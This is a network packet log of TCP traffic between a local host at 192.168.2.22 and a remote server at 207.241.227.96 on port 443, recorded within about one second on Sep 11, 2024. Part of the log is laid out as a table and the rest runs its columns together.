                                                Sep 11, 2024 20:22:22.214435101 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.214476109 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.214502096 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.214551926 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.216356039 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.216411114 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.216427088 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.216481924 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.277069092 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.277121067 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.277158022 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.277189970 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.277204037 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.277204037 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.309245110 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.309289932 CEST44349162207.241.227.96192.168.2.22
Timestamp                             Src port  Dst port  Source IP       Dest IP
Sep 11, 2024 20:22:22.309318066 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.309333086 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.309389114 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.309422970 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.310472012 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.310503006 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.310530901 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.310539961 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.310548067 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.310554028 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.311448097 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.311486006 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.311517954 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.311523914 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.311537981 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.312369108 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.312398911 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.312424898 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.312433004 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.312442064 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.312454939 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.313477039 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.313512087 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.313534975 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.313541889 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.313549995 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.313572884 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.313596010 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.314805984 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.314838886 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.314867973 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.314876080 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.314883947 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.314883947 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.335608006 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.335644960 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.335665941 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.335685015 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.335705042 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.335736036 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.369602919 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.369638920 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.369682074 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.369704962 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.369715929 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.369740963 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.405942917 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.406035900 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.406038046 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.406074047 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.406105042 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.406420946 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.406486034 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.406490088 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.406517982 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.406548977 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.406956911 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.407016993 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.407032013 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.407057047 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.407089949 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.407588959 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.407659054 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.407680035 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.407697916 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.407749891 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.407757998 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408132076 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408190012 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.408198118 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408217907 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408276081 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.408282995 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408653975 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408706903 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.408715963 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408734083 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.408787966 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.408797026 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.414673090 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.461879969 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.461916924 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.461991072 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.462018013 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.462045908 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.462045908 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.462373018 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.462409973 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.462420940 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.462428093 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.462450981 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.498848915 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.498883963 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.498984098 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.499011993 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499023914 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.499249935 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499284029 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499299049 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.499310970 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499321938 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.499835968 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499862909 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499878883 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.499886036 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.499893904 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.499914885 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.500644922 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.500674963 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.500690937 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.500696898 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.500705957 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.500725985 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.500984907 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.501014948 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.501029015 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.501036882 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.501044989 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.501063108 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.501454115 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.501483917 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.501498938 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.501503944 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.501512051 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.501533031 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.566674948 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.566764116 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.567018986 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.567018986 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.567018986 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.567070961 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.567254066 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.567326069 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.567337036 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.567370892 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.567408085 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.591016054 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.591084957 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.591361046 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.591361046 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.591396093 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.591603994 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.591675997 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.591681957 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.591711044 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.591734886 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.592094898 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592161894 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.592173100 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592187881 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592233896 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.592240095 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592731953 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592765093 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592783928 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.592793941 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.592811108 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.593255997 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.593285084 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.593307018 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.593313932 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.593327999 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.593333960 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.593713045 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.593744993 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.593764067 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.593770027 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.593791962 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.799410105 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.799489021 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.869353056 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.869446993 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.869652033 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.869652033 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.869652033 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.869684935 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.869756937 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.869821072 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.869832993 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.869865894 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.869894028 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.870927095 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.870985985 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.870995045 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.871026039 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.871052980 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.871515036 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.871592999 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.871601105 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.871663094 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.871690989 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.872071028 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.872126102 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.872140884 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.872169018 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.872196913 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.873164892 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.873224974 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.873229027 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.873245001 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.873281002 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.873300076 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.873328924 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.873353004 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.873368025 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.873385906 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.873435020 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.874161959 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.874193907 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.874208927 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.874217987 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.874233007 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.874332905 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.874366999 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.874398947 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.874409914 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.874423027 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.874447107 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875097036 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875127077 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875149965 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875159025 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875174999 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875658035 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875690937 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875709057 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875716925 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875737906 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875771999 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875808954 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875828981 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875838041 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.875852108 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.875861883 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.876502037 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.876537085 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.876564026 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.876570940 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.876585007 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.876635075 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.876663923 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.876683950 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.876693010 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.876708984 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.876725912 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.877388954 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.877424002 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.877444029 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.877453089 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.877484083 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.877569914 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.877600908 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.877615929 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.877623081 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.877644062 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.877682924 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.878684044 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.878715992 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.878737926 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.878746033 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.878762007 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.881506920 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.881541967 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.881561041 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.881571054 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.881586075 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.881921053 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.881951094 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.881970882 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.881979942 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.881995916 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.882539988 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.882575989 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.882591963 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.882600069 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.882615089 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.882714987 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.882745981 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.882761002 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.882770061 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.882790089 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.883371115 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883429050 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.883438110 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883460045 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883503914 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.883512974 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883650064 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883704901 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.883707047 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883737087 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.883763075 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.884248018 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.884301901 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.884313107 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.884341002 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.884372950 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.928632021 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.928673029 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.928811073 CEST  49162     443       192.168.2.22    207.241.227.96
Sep 11, 2024 20:22:22.928850889 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.929270983 CEST  443       49162     207.241.227.96  192.168.2.22
Sep 11, 2024 20:22:22.929305077 CEST  443       49162     207.241.227.96  192.168.2.22
                                                Sep 11, 2024 20:22:22.929321051 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.929336071 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.929351091 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.961666107 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.961766958 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.961926937 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.961973906 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.961992979 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.962115049 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.962246895 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.962306023 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.962317944 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.962348938 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.962373972 CEST49162443192.168.2.22207.241.227.96
